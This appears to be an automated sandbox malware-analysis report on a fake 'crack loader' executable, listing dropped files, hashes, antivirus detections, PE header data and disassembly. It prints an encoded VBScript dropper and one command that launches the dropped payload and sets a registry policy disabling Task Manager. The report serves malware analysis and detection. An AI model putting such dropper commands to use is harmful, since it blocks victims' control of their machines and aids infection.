              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (934), with no line terminators
              Category:dropped
              Size (bytes):934
              Entropy (8bit):5.916477979084123
              Encrypted:false
              SSDEEP:24:EBVc4mztMXq/y5QzWvjw+kETYg63E14Pw4HW1/oPrnPUNTtnieYnR3Ek5M:oi7zt6q/yLNkETw04Pw+rzoTliekBM
              MD5:4AA63F70E0A647BE9AB0C5C7F817AFBE
              SHA1:0423B11CB93ABFA76FCA7F25F76FD4F2AD398DA6
              SHA-256:8C8DF8DD39775AEF67D68A31A1510B3CD8A14983087F177044D1CA2636ABA078
              SHA-512:7AA0D5FDD1C24CD4B38F91709BAB875697F0F53F2DBF2890038B7369FA9B9D0FAF53AAD550588583DA79B83BC002EBC1132E82102691EADA925914900D0FFF78
              Malicious:false
              Preview:Tz5OaGtkRCDxM2EIHVevVkyfP0mYOo5pJXyHGervdd3CzMWW7mVJLTksBa9jdVVmHYnyD7CnntR1rvpCeQamTwdzxGGpfISIIQ5bjiSAjsfcCtBQv6FN5tTV4xB70XIfaJsbzNd58ZCkQBxEFz4iCFMZ6jhvgVKMk9B2AjahcJPgqsE2A62AcjcV6TeQqsZmP0AQ94EfZWF30qsOeovjdJtAhq6qEK1uumR0ry3F2WlGdjfQlQvB7zJFH9tT8XbOfVINZ2gqvprGhnh7KpFxYzx5cLsrEjHe5WkIbR1suEQSIChdcwISSn0phNvOJymLhMLLCZg2yWDUjfxZnPPRazLSg4kNgmi5cEu51WaDPQd6jfGCaVk4jUusA2oIySWLxI1eu1hQyLCKVPtAyixLBoVHUC49rSO73SIaolRixUGXSjWvJoTQeLJJwtKs6ijf7FRDGSWNRPXri8zvpJzD88csI9o4bilOvkZNSTo1RG9Pxckx4YCxsfg9mj4GncvsnJ68imdVe8v28M4qY09CgyfPDaksZhNzUQlofmPR5rSuuoAaoOrxctLznr4HCu67v5hskQKwlrGzgveYZKELzaWlEwAyrHPLuV8zGSzYD5MumWT2Mgr1qvHVi6nyPVEdc5EKwpRHUpH4Nm9sdImLZXf9OnQKpBJr0sSqSIFgOkhAnMH665VGt3DEaE6JZHcTgZDfTSZUDF7z0eVBfTNupC87oOQNL5HGIOdNJmmofADn6ON5t5oF3rnebG0FBMIH80qmBH23rjPo8UAaAVeQRCNak9wCvhmS25pGhl3lCuYTc8fHFaEqs1z6mQBCVzHJ76wDo42Yb2Nho37ldo6Vc5kAGtdRk1PMnOWgMccLhqPzoSSsSZiq3wrBWw65blyjmA3ZhbZBMvxwquWxau8KSjT0hVKZfgt61pMnY2
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):294
              Entropy (8bit):5.847081639304441
              Encrypted:false
              SSDEEP:6:L9pJQMhRUYrj4YOKW5dvl3S8rMHD/LHF9rnijK8fUrCBkR:ZQMHLOKkthGD/B9zuML
              MD5:8761B95A3C2ECD1EBA2B3755AD23BDC3
              SHA1:34576CB5F2F7A9F901DE709793B6B41C51EFE859
              SHA-256:9474D0B19330CC04679DDC30ECFD12C61C9914E25159A0554767795ED599E097
              SHA-512:3A03C7F681A6F23F556D2961B0D47437ACCB59E5B431F36D91A2383215F3F18014A0D0FB8AE5C836E3674199EC7423A79EF8844A0252727B21BC44561C7EF01F
              Malicious:false
              Preview:rgNC2IrOdkWPnGGUnQUnqcDVklCGS5jrA1Tp8rNl0kc1JKbOlXLrrnlPc2cQGk5iAoOwxaW5CsxF9MLZKxe5t19XPDNFP6ePp40f6obLAQp90fPQqCGTG9yJo0gtMQpGOhaEWpdfWT4dMAhuy7ZNzLJpFq0FHs8tljuSFL3Bil7wEV7nTw5P1bQDYv8pyYXoVL2mPOpnDYoOOXkutNvVws1JTr4TMOMKNTa3dUYFHSMdxBzAKO5lmC1mTtTiUVbyMdB56qRYzqNegYWR23J7SkiLbxjuBzuv0XRTA4
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1830
              Entropy (8bit):5.3661116947161815
              Encrypted:false
              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpBGqZ8
              MD5:498D8CC0F157AA5168D6679E694BD803
              SHA1:05A8C750A8FC7F3438945EC9607C4F240917C31B
              SHA-256:5A452026BD10A826A716DD6A5B5D7D731458217CD89CD9F24FFC5A52AE6CD35F
              SHA-512:9924A15F7EC4B178E0C7B2BA6CDA7D26787372E63C49B66019D13696C14BFA3AADD2A597416E3589CE8B3F6AB4C9EE32A8BAA7C66ADDEA7A09C78B90B33CC893
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
              Process:C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):1281
              Entropy (8bit):5.370111951859942
              Encrypted:false
              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
              MD5:12C61586CD59AA6F2A21DF30501F71BD
              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (1532), with no line terminators
              Category:dropped
              Size (bytes):1532
              Entropy (8bit):5.383874903019373
              Encrypted:false
              SSDEEP:24:+4w2L+tYUSIugMYUZ+68TIi2gISis01QI59EfwI7zEIzxBaIljwEUi+Cf+N:fzSut+qitbh01Psv7bBN5b5fe
              MD5:6A63C439D7719C13E3E32ABA79F7D014
              SHA1:13C23C2568F492068F3BA51E7A6CF54F8E7B3BCE
              SHA-256:42114CB2F25684E4263691A9B847B5D66E847D81CD141366343CF00838CFFC4F
              SHA-512:E9B806BA5A46A5D65C514E7C9315B2C9D50B159F9A4FCDA3D2519007C0D986480B9FB6C6A3BBB70C488019B4334121B4B9A6A49D38038444525EE7A0050DB63E
              Malicious:false
              Preview:eyIzYjZmYWE1Yzg4NGJkMzEzMmQwNWQ4YmExOGM2M2Y2ZTZkMzQ4ZDcxIjoiW1wiQzpcXFxcY29tY29udGFpbmVyXFxcXFN1cnJvZ2F0ZVJlZi5leGVcIixcIkM6XFxcXFByb2dyYW0gRmlsZXMgKHg4NilcXFxcamRvd25sb2FkZXJcXFxcY29uZmlnXFxcXFN3cFRuQ25yc0FBS2pnVEFRLmV4ZVwiLFwiQzpcXFxcUmVjb3ZlcnlcXFxcY3Nyc3MuZXhlXCIsXCJDOlxcXFxSZWNvdmVyeVxcXFxXbWlQcnZTRS5leGVcIixcIkM6XFxcXFByb2dyYW0gRmlsZXMgKHg4NilcXFxcamRvd25sb2FkZXJcXFxcY29uZmlnXFxcXFJ1bnRpbWVCcm9rZXIuZXhlXCIsXCJDOlxcXFxVc2Vyc1xcXFxQdWJsaWNcXFxcQWNjb3VudFBpY3R1cmVzXFxcXFN3cFRuQ25yc0FBS2pnVEFRLmV4ZVwiLFwiQzpcXFxcUHJvZ3JhbSBGaWxlcyAoeDg2KVxcXFx3aW5kb3dzIG1haWxcXFxcU3Vycm9nYXRlUmVmLmV4ZVwiLFwiQzpcXFxcV2luZG93c1xcXFxDYnNUZW1wXFxcXFJ1bnRpbWVCcm9rZXIuZXhlXCIsXCJDOlxcXFxQcm9ncmFtIEZpbGVzXFxcXFdpbmRvd3NQb3dlclNoZWxsXFxcXFN3cFRuQ25yc0FBS2pnVEFRLmV4ZVwiLFwiQzpcXFxcUHJvZ3JhbSBGaWxlc1xcXFxXaW5kb3dzIE5UXFxcXElkbGUuZXhlXCIsXCJDOlxcXFxSZWNvdmVyeVxcXFxTd3BUbkNucnNBQUtqZ1RBUS5leGVcIixcIkM6XFxcXFJlY292ZXJ5XFxcXFN3cFRuQ25yc0FBS2pnVEFRLmV4ZVwiLFwiQzpcXFxcUHJvZ3JhbSBGaWxlcyAoeDg2KVxcXFxyZWZlcmVuY2UgYXNz
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (879), with no line terminators
              Category:dropped
              Size (bytes):879
              Entropy (8bit):5.9119876652443075
              Encrypted:false
              SSDEEP:12:UALEEBK66BLf4yjo3lkqYXTJMQA1qWKVIDtJb9yBHW/5ZbasNRX+K5DdK9MhknSM:UlEY5Kyjo3lkPNXA1qwtJtfOe49MhLG
              MD5:9B00901E83D8D09F5604F9C6E3692D55
              SHA1:CABC06BBD99530723191F7446626012B0299A138
              SHA-256:92C5A84E930F77E28B578E9C04EED09A22E5677373F22AE66B3F7246CC760097
              SHA-512:659DD257282D8CD61F10E98A33156406A4602327F00942EBF3FFD07C475B0EF01A371C2B2836D0FBB8D8881BE0E45720CCF60CAD5BAF10453696FBF1553D430D
              Malicious:false
              Preview:vOoXvOVoxjy3QG30fLzY8gJSVjUCpWqXp9jLNfOiUpA6YyHSXLaMRd4OFWBM3T9b2bORhrn96RDSfM3gbCoe6eGLFUG0dBoAqjE7k0uqhaQAZlt2dfv1pefYUCMNlwg4mCm5I56kR86fOFvekOX8QxVLEpmhogEv3VXW8ythiKjri9KPQrnWZhnzrb1dTY6v3Lm2rYfwe0ZGNnmFfXR63sWWripg6QOKNyyXXSh1M01iIglEyv75H91KyPKJt8zOlP3ZzPsM0ZuC0xOL7ksLSSDO7niHHYINBn62nMOjDuErPyUBB9LIQo5TMocLqkFcRhBN0VhuWIHhOV9IThFIM96Wsnq8uD3cpmarxGKqcbwIhXF1pT2Ie7QSlpfMoiASPo2l4RVMWZpvMyzUizTaLu7sVIGHl7B4ad22fd6Y8pwFRfFwzKoyPjHfqKPvLNkYXvUs56zF34cf82a0CTSbTMp1WXMVNKMvEXrgKW13Vi5UGmgxtYt15JELGcWite1srrblL4qpcYGuRUuu0YlybVz5SgZsASJ0qMmZK5mzsDZgDT3vrmrV2DRW1fSoe7pJPPEEsVj4wwFY5T28moAYly7n5Piom7UvXQQxPzDWCwiG72ahnUC06QhbRaIcx4SybUApCEsxloVzP1qDyABS5eyGszfzqkjIetpn1vfjmOPS5sLauFnw3936g47Mi2GAFNUfLCLDfbqqPfL9oFFk7wOe0tG7ySAtIONrYpPr4jRbTNqAs7idxgCT8zpb6NPMb7iBSdl80XqXexLnDGP0ug5lL4tiAxvqUF9WopsOWjnZzpyKnCYz8Zc5B6zYuD7Cm9DYyz8YYAeK2fwgFi48Z5s5mDUs0TeSmlx0laWyDAb84SC
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\NewLoaderCracks_1.32.exe
              File Type:data
              Category:dropped
              Size (bytes):211
              Entropy (8bit):5.837882189916454
              Encrypted:false
              SSDEEP:6:GEwqK+NkLzWbHa/JUrFnBaORbM5nCm0fHw3z2UW1:G1MCzWLauhBaORbQCm0fQzO
              MD5:BC647A515EEB02F2366108CD43723FD4
              SHA1:69B6E076499CE0CC261783566BBFF1A44B988862
              SHA-256:372F7D05AD9C45EB270304D6A1AC9E0BDD67141294C8B4182D2CBAE55F9DE905
              SHA-512:338178D3F253FE2E508499766765BAAAE444B6E501498C33C43E369EB9C6C317FC84C9298931DC75CAF8AE50499222F7239B5AA0D940411E79E956AD6646459D
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              Preview:#@~^ugAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z^K:1WxDlbU+Mza1wMWFyXwXB/T/MkhX3o,c4CYES,!SP6CVk+UDsAAA==^#~@.
              Process:C:\Users\user\Desktop\NewLoaderCracks_1.32.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):61
              Entropy (8bit):5.008789289078828
              Encrypted:false
              SSDEEP:3:hpHOh/rLAQ/GUUBp:/NQ/Ra
              MD5:7ADAAF478F63A879B2166B02708095B3
              SHA1:A0F756FE347FD24616A92E039CC63FF9D5D8D8B2
              SHA-256:5DDF899AAAB6365AE508E33CF53D195ACB8F9D8FC7CA6058CA9F277570A338BB
              SHA-512:CC0D8FC3E75D15EB1C18D3A5DD0A81A2191D56136F009397DA3354459529898C43D0F0DDB7E62D3C789D2CA45C4C792B5B47E34B4E1054FCA8182063C1DE50E6
              Malicious:false
              Preview:yuLy1pZ41hxr8ZlDZNWXDPxIrd16vzy2i9hRUVwyksn1h1VjXbK2Nq9i7DHXy
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (671), with no line terminators
              Category:dropped
              Size (bytes):671
              Entropy (8bit):5.861236653698843
              Encrypted:false
              SSDEEP:12:FmktZEalqsZNSRRgHtpGH8tF9CvhUZIvJxQvS28REGzVL11LVSTnkwjiryu+Q:FmkZlncRgHKctF0hBsAHVB1hSTnkSirj
              MD5:A3115F1A00277A569449DB6F361DC0DD
              SHA1:397EE5B26A7CD3EDA575415729F586E08BEAC1B7
              SHA-256:851866D881E9A1FF9BE15F33CEF558EB85AC2C6A7FA86EC35A9C5E1282C50702
              SHA-512:724792E360B7E06183896BFBBC6C2F2C7B4959209A56510EBDC98A2E1C5F7650D4F17419E3A6147CCBD025D0503D919AD6F8A2BB808A12200EE00ED1D7075BAA
              Malicious:false
              Preview:HuoE4KFe9IP9pHNMCLzGVMREbbjZ9FadxONVjeR8PcYuTh1itPF1YWT4cknckqe3swMb41mi3113yhv3jBqu9jEa4S390zXi7eBhUao1mh7gfaF4zt2jAt3Jrwgl8mrEeS5TfNjJXyHcli4eN9KG7yiOl2zh3C3Az3CNfwYlKsMLlbhJ2CY9bkHqtrsnXBPU5Hmsgr8akj6OlWmJVqp1o3iOwVdyEvNId1PdyymLD7Y2o2EXEiRrWYqBjX6KNKWyVyvuGIVgDexqepk3RGtfegwEKO4a2c72kkg0HTQ6Nun2l9h4xC3Hb1UzBqk2O4olg4G4Iuv7zwSt34dKqAn0i0btPrybtXsTGBVq3mvDR5Roil6HNZLNQxCqdXpb5UObE9m1iwREOkjniwKnvqNUMeCS9pNg6UH6r0jj8EjbIH8qOZIqNBpPG3Pk6T23jvH4cm5rNkpqGwMFfVEjggT4o2zxk9noMq1W9EOmdadmW8IUrKEkPSWCcNQkwIHN7Aea4zGbHcGGDqiptfFa5CY3Tz4wynzVTPoVdra2EncxMP8vok0RCqS4llHE4TnemuxyBMMBENWRjlqE0IHOwhTm7tt2kV7uA8KbbKubXyNyTAVA4CNwMZrFbK1RcTbsQmRkaOmqYp07UeT6Yt7hILhlRFARTc9EXei
              Process:C:\Users\user\Desktop\NewLoaderCracks_1.32.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):146
              Entropy (8bit):4.979754626494337
              Encrypted:false
              SSDEEP:3:I5jM0X4xA3mLACZFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKD:IpMOm0FTStuH1jhRiI36BY
              MD5:CFFC740262BD32EF47BCF7B4D9BF4B02
              SHA1:890BA622B0B840444FF36F41D0805143E95C39FE
              SHA-256:2E7BCCC5E8D1632C692F8F538D8A0B0582C4B7861F00A537F08FBEF3C4B87C7B
              SHA-512:4F60373EB1AE629AAEC872333BDD561E373A038077988F411DBE9712814DFE06D7FCDA3ECE355ABB901FB1D252A321F54C07EE0136089EC502BD016F5BECE6B5
              Malicious:false
              Preview:"C:\comcontainer\SurrogateRef.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.991880967110508
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              • Win32 Executable (generic) a (10002005/4) 49.97%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:NewLoaderCracks_1.32.exe
              File size:2'064'076 bytes
              MD5:957e3773e9346cee687c19fce88b7f4a
              SHA1:86e0dbdf89012c5e2fee9feb0867ce867e8d5a1a
              SHA256:2928f73f9fa919f37465f87f2cec1098c255bb420bc38d245aeb136c6e7f1271
              SHA512:3f9a3943b511aec7d95371ca77e2e6958d342b5e96480f6c8db376520ba8b2dd3f81f7834c8e0fc39f2bd4633331f22f0bb165f60c7ba622404f1b09fb1931e0
              SSDEEP:24576:h2G/nvxW3WbMn0Xbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcpm:hbA3+M0Xbux7bKPRse0mTnqfELMJ5
              TLSH:65A59D413E448A11F0191A37CEFF65079BB098112AABD71B7DB9376E65D13A27C0CACB
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
              Icon Hash:000812b269640800
              Entrypoint:0x41ec40
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
              Instruction
              call 00007F821D15F3B9h
              jmp 00007F821D15EDCDh
              cmp ecx, dword ptr [0043E668h]
              jne 00007F821D15EF45h
              ret
              jmp 00007F821D15F53Eh
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F821D151CD7h
              mov dword ptr [esi], 00435580h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 00435588h
              mov dword ptr [ecx], 00435580h
              ret
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              lea eax, dword ptr [ecx+04h]
              mov dword ptr [ecx], 00435568h
              push eax
              call 00007F821D1620DDh
              pop ecx
              ret
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F821D151C6Eh
              push 0043B704h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F821D1617F2h
              int3
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F821D15EEE4h
              push 0043B91Ch
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F821D1617D5h
              int3
              jmp 00007F821D163823h
              jmp dword ptr [00433260h]
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              push 00421EB0h
              push dword ptr fs:[00000000h]
              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              • [C++] VS2015 UPD3.1 build 24215
              • [EXP] VS2015 UPD3.1 build 24215
              • [RES] VS2015 UPD3 build 24213
              • [LNK] VS2015 UPD3.1 build 24215
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000x46968.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000x2268.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
